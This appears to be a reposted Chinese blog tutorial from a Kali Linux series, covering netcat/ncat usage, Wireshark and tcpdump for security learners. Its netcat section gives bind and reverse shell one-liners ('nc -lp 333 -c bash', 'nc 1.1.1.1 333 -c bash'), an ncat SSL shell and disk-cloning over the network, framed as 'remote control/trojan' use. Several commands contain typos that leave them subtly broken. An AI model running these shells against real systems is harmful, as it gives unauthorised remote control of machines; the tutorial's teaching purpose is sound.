Kali Linux 从入门到精通(六)-基本工具使用
基本工具
常用工具:
经常使用且功能强大
安全从业者必不可少的帮手
Nc/ncat
Wireshark
Tcpdump
NETCAT-NC(瑞士军刀)
基本介绍
网络工具中的瑞士军刀-小身材,大智慧
侦听模式/传输模式
telnet/获取banner模式
传输文本信息
传输文件/目录
加密传输文件
远程控制/木马
加密所用流量
流媒体服务器
远程克隆硬盘
一波操作
NC-TELNET/BANNER
nc-nv 1.1.1.1 110 (pop3 服务器)
nc-nv 1.1.1.1 25 (smtp 邮件服务器)
nc-nv 1.1.1.1 80 (网站)
nc -h 查看nc可用参数
NC-传输文本信息
A:nc -l -p 4444(打开4444端口) 使用netstat -pantu | grep 4444 查看端口是否打开
B:nc -nv 1.1.1.1 4444
nc -q 传输后直接断连接
远程电子取证信息收集
NC-传输文件/目录
传输文件
A:nc -lp 333>test.mp4
B:nc -nv 1.1.1.1 333 < test.mp4 -q 1
or
A: nc-q l -lp 333<a.mp4
B: nc-nv 1.1.1.1 333>2.mp4
传输目录
A:tar -cvf -music/ | nc-lp 333 -q 1
B:nc -nv 1.1.1.1 333 | tar -xvf -
加密传文件
A:nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B:mcrypt --flush -Fbq -a rjindael-256-m ecb <a.mp4 | nc -nv 1.1.1.1 333 -q 1(对称加密算法)
NC-流媒体服务
A:cat 1.mp4 | nc -lp 333
B:nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
NC-端口扫描
nc -nvz 1.1.1.1-65535 (探测tcp端口)
nc -nvzu 1.1.1.1-1024 (探测udp端口)
NC-远程克隆硬盘
A(接收端):nc -lp 333 | dd of=/dev/sda
B(被取证电脑):dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
远程电子取证,可以将目标服务器远程复制,或者内存
NC-远程控制
正向:
A(服务器):nc -lp 333 -c bash
B(客户端):nc 1.1.1.1 333
反向:
A:nc -lp 333
B:nc 1.1.1.1 333 -c bash
注:windows用户把bash改成cmd
适用于内网访问外网
NC-NCAT
NC缺乏加密和身份验证(肉鸡可能被窃取)的能力
Ncat包含于nmap工具包中(可实现加密,身份验证,每次会重新生成指纹信息)
A:ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
B:ncat -nv 1.1.1.1 333 --ssl
不同系统/平台的nc参数功能不尽相同
WIRESHARK(后续补充)-被动扫描大法
基本介绍
抓包嗅探协议分析
安全专家必备的技能
抓包引擎
Libcap9----Linux
Winpcap10—Windows
解码能力(评价之根本)
基本使用方法
启动
选择抓包网卡
混杂模式
实时抓包
保存和分析捕获文件
首选项
WIRESHARK-筛选器
过滤掉干扰的数据包
抓包筛选器
显示筛选器
WIRESHARK-常见协议包
数据的分层结构
ARP
ICMP
TCP(三次握手)
UDP
DNS
HTTP(明文协议)
FTP
WIRESHARK-TCP
数据流
HTTP
SMTP
POP3
SSL
WIRESHARK-信息统计
节点数
协议分布
包大小分布
会话连接
解码方式
专家系统
WIRESHARK-实践
抓包对比nc,ncat加密与不加密的流量
企业抓包部署方案(采用商业化软件)
Sniffer
Cace/riverebed (底层基于wireshark)
Cascad pilot(大流量抓包++)
镜像端口(Cisco)
TCPDUMP
基本介绍
No-GUI的抓包分析工具
Linux,Unix系统默认安装
TCPDUMP-抓包
抓包
默认只抓68个字节
tcpdump -i eth0 -s 0 -2 file.pcap
tcpdump -i eth0 port 22
读取抓包文件
tcpdump -r file.pcap
TCPDUMP-筛选
tcpdump -n http.cap | awk ‘{print $3}’ | sort -u
tcpdump -n src host [ip address] -r http.cap
tcpdump -n dst host [ip address] -r http.cap
tcpdump -n port 53 -r http.cap
tcpdump -nX port 80 -r http.cap
TCP 高级筛选
tcpdump -A -n ‘tcp[13]=24’ -r http.cap
过程文档记录
Dradis(Kali 自带)
短期临时小团队资源共享
各种插件导入问价
Keepnote
Truecrypt(注重信息保密)
团队中需要文档人员
---------------------
作者:无涯逍遥
来源:https://blog.csdn.net/qq_33592583/article/details/85638912